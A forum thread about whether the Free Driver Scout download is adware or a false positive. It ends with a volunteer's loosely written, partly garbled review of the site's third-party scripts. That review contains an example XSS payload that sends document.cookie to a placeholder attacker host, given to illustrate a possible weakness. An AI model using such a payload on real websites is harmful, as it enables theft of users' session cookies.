Free Driver Scout false positive?

http://freedriverscout.com

Getting detected as Win32:Adware-gen [Adw]. Even without PUP enabled. Is this correct?

My F-Secure blocked the download

Turning off F-Secure, then it is blocked by Chrome

VirusTotal
https://virustotal.com/nb/file/a542d8babd64ee70630ddd154f97f539d275a022346f568411539f60338fd74e/analysis/1464212529/

Metadefender >> https://www.metadefender.com/#!/results/file/21edaec0bbe74c95bd1b72ec326a4a39/regular

Jotti >> https://virusscan.jotti.org/en-US/filescanjob/7bnosilign

It was highly praised by PC Support webpage: http://pcsupport.about.com/od/driversites/tp/free-driver-updater-tools.htm

I tried Driver Booster and I quite like it. Now I’ve wanted to try this one and it was stopped by avast!..

The real question is if you need such a tool.

Is there a need to have the latest drivers installed ?
Normally not, but there are exceptions ofcourse.
e.g.
If the new ones fix a a security flaw. (for instance if you use a printer through wifi)
If the new ones fix a bug that is making your hardware not work properly.

And why using a 3rd party tool for it?
They don’t have a database for the millions of different hardware that exist.
Manufacturers websites have the newest drivers before those tools have them listed.

It matters not if you need such a thing, only that you want to use/try it and it is being blocked.

Detection has been changed to PUP.

It is when you have to reinstall a device like a Windows tablet and you don’t have a slightest clue what all those weird PCI controllers are and there is no centralized driver download like for regular motherboards. But with tools like this, everything gets detected and installed properly. Without these tools I’d never get it working properly.

EDIT:
It’s still being detected exactly the same as before. Where was it moved to PUP detection? Looks the same for me…

For issues like this I’d suggest
https://sdi-tool.org/
Yes, it’s big, but it does its job very well (used it myself many times).

i just stick with iobits driver booster. It gets the job done.

So, what is with this file? Is it a false positive or a genuine detection?

It is a PUP.A genuine detection for sure.

Hi RejZoR,

When you see what is running at that site: http://retire.insecurity.today/#!/scan/60fc1c974bfdf490c2c49eb8c19231fceeae8d410bc8adf5544c38ac780280e3
and you know what to block and are intented to willingly download the potential unwanted software,
because you are fully aware of any risks involved, then there is no risk downloading the tool.
Nothing to hold you back.

Script blockers block some of the third party code running on that website like: -http://dmp.theadex.com/d/105/21/s/adex.js
and -http://beacon-4.newrelic.com/1/26cb0a7878? and -http://js-agent.newrelic.com/nr-100.js
Well a developer of free tools have to make an income of sorts somewhere so tracking scripts galore on such a page,
resulting in that PUP alert.

Just see where this lands for instance: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fjs-agent.newrelic.com%2Fnr-100.js

The code error next to the XSS sources and sinks:

 detected] script
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ar NR_QUEUE=[];"undefined"!=typeof window.NREUMQ?NR_QUEUE=NREUMQ:"undefined"!=typeof window.EPISODES?NR_QUEUE=EPISODES.q:"undefined"!=typeof window.NREUM&&(NR_QUEUE=NREUM.q);var NREUM=NREUM||{};NREUM.q=NR_QUEUE,NREUM.targetOrigin=[i]document.location.protoco[/i]
          error: line:3: ^

New Relic Google Episodes code that comes shared on the webs. Exceptions should be mitigated by re-copiing for errors.

So whenever you use free tools to-day you pay with some of your privacy and meta-data, it always comes at a price that you should be willing to pay or you should block what should be blocked at such a page.

Non-persistent cross-site-scripting attacks are possible here, depending on where code has access,
and could be performed via an attack like for instance

<SCRIPT>
document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>

.
Just to give an example for document.location.protoco → document.location.href)+“&p=”+NREUM.sHash(document.referrer)
and indeed there is room for insecurity for scripts running on the site, see: https://sritest.io/#report/0cddf512-ac4d-4005-b3da-5be611dfeb93

See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.optimizely.com%2Fjs%2F507870057.js SRI hash missing
and Results from scanning URL: http://cdn.optimizely.com/js/507870057.js
Number of sources found: 103
Number of sinks found: 42

Could be a good idea to profoundly security test all the code on that website,
but i.m.h.o. there are no immediate malware threats not from the site nor from that tool,
better security could be implemented though, just be aware of the complicated code chain error consequences.
All works through on the general website’s security infrastructure.

Have a nice day,

polonus (volunteer website security analyst and website error-hunter)